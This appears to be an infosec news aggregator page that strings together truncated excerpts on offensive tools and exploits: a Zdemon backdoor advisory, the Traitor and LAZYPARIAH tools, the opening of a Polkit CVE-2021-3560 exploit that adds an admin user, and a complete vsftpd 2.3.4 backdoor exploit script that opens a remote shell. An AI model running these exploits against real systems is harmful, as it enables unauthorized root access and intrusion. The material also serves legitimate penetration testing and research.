More @ https://skynettools.com

The malware Zdemon listens on TCP ports 31556, 6051. Third-party attackers who can reach infected systems can execute commands made available by the backdoor.

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/d12f38e959d70af76fd263aa1933033c.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Zdemon.10
Vulnerability: Unauthenticated Remote Command Execution
Description: Zdemon malware listens on TCP ports 31556, 6051. Third-party attackers who can reach infected systems can execute commands made available by the backdoor.
Type: PE32
MD5: d12f38e959d70af76fd263aa1933033c
Vuln ID: MVID-2021-0313
Disclosure: 08/05/2021

Exploit/PoC:
nc64.exe x.x.x.x 31556
001
112
112Victim 01
1.11002
002 [ PC Details ]

User name : Victim
Computer name : DESKTOP-2C3IQHO
Registered owner :
Registered organisation :
Processor name : Intel64 Family…

Traitor - Automatically Exploit Low-Hanging Fruit For A Root Shell. Linux Privilege Escalation Made Easy

Traitor packages up a bunch of methods to exploit local misconfigurations and vulnerabilities (including most of GTFOBins) in order to pop a root shell.

It'll exploit most sudo privileges listed in GTFOBins to pop a root shell, as well as exploiting issues like a writable docker.sock or the recent polkit CVE-2021-3560. More routes to root will be added over time too.

Usage

Run with no arguments to find potential vulnerabilities/misconfigurations which could allow privilege escalation. Add the -p flag if the current user password is known. The password will be requested if it’s needed to analyse sudo permissions etc.

traitor -p


Polkit versions 0.105-26 and 0.117-2 suffer from a Local Privilege Escalation (LPE) vulnerability. The exploit allows an unprivileged user to gain root access to the Linux system. Updating the system is recommended to avoid exploitation.


# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation
# Date: 06/11/2021
# Exploit Author: J Smith (CadmusofThebes)
# Vendor Homepage: https://www.freedesktop.org/
# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html
# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)
# Tested on: Ubuntu 20.04, Fedora 33
# CVE: CVE-2021-3560
# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

#!/bin/bash

# Set the name and display name
userName="hacked"
realName="hacked"

# Set the account as an administrator
accountType=1

# Set the password hash for 'password' and password hint
password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'
passHint="password"

# Check Polkit…


HostHunter v1.5 - Discover & Extract Hostnames Providing a Large Set of Target IP Addresses

A tool to efficiently discover and extract hostnames providing a large set of target IP addresses. HostHunter utilises simple OSINT techniques to map IP addresses with virtual hostnames. It generates a CSV or TXT file containing the results of the reconnaissance.

The latest version of HostHunter also takes screenshots of the targets; this is currently a beta feature.

Installation

- Tested with Python 3.7.2.

Linux / Mac OS

- Install python dependencies.

$ pip3 install -r requirements.txt

The next few steps are only required if you would like to use the Screen Capture feature.

- Download and install the latest version of…


Vulnnr - Vulnerability Scanner & Auto Exploiter

Create a target list or select one target, scans then exploits, done!
Vulnnr is a vulnerability scanner and auto exploiter. You can use this tool to check the security of your website by finding vulnerabilities in it, or you can use it to get shells.

Offers

LFI Scanners > Coming soon

XSS Scanners > Working

SQLI injection scanners > Working

Domain Scanner > Using hackerone API/finds subdomains

CMS detector > Working

Server detector > Working

Common vulnerable files Scanner > Working

Directory Spider/Scanner > Working

Dorker > Working/Uses Google's search engine/ auto exploits

Autodorker > Working, takes a list full of dorks (Don't recommend using)

Vulnscan > Scans one target

Vulnauto >…



# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3

from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here, then exit on Ctrl-C
    print(' [+]Exiting...')
    exit(0)

signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()


# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow
# Date: 09-04-2021
# Exploit Author: Jai Kumar Sharma
# Vendor Homepage: https://www.expressvpn.com/
# Software Link: https://www.expressvpn.com/vpn-software/vpn-router
# Version: version 1
# Tested on: Windows/Ubuntu/MacOS
# CVE : CVE-2020-29238

*Proof of concept*:

ExpressVPN Router's login panel runs on an Nginx web server; version 1 of the router's firmware hosts the web login panel on a vulnerable version of that web server.

ExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version…

AVAIN - Automated Vulnerability Analysis (in) IP-based Networks

About

AVAIN is a modular vulnerability analysis / penetration testing framework for computer networks and individual machines that allows its modules to work collaboratively to achieve more sophisticated results. Once you start an analysis with AVAIN, it uses its modules to enumerate, find vulnerabilities and assess the overall security level of an IP-based network or host. During the analysis, the most relevant results are shown directly in a comprehensible way. The complete and in-depth results are saved for later to enable the user to fully retrace the assessment. In addition, AVAIN automatically aggregates certain types of results during the analysis…


LAZYPARIAH - Low-Dependency CLI Tool for Generating Reverse Shell Payloads

LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly.

The reverse shell payloads that LAZYPARIAH supports include (but are not limited to):

- C binary payloads (compiled on the fly): c_binary, c_binary_b64, c_binary_gzip, c_binary_gzip_b64, c_binary_hex, c_binary_gzip_hex

- Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c

- Base64-encoded Python payloads: python_b64

- Rust binary payloads (compiled on the fly): rust_binary, rust_binary_b64, rust_binary_gzip, rust_binary_gzip_b64, rust_binary_gzip_hex, rust_binary_hex

- PHP scripts containing base64-encoded Python payloads called via the system() function: php_system_python_b64

- Java classes (compiled…

SkyNet Tools

Providing the Latest #Infosec #News, #Tools, and #Exploits
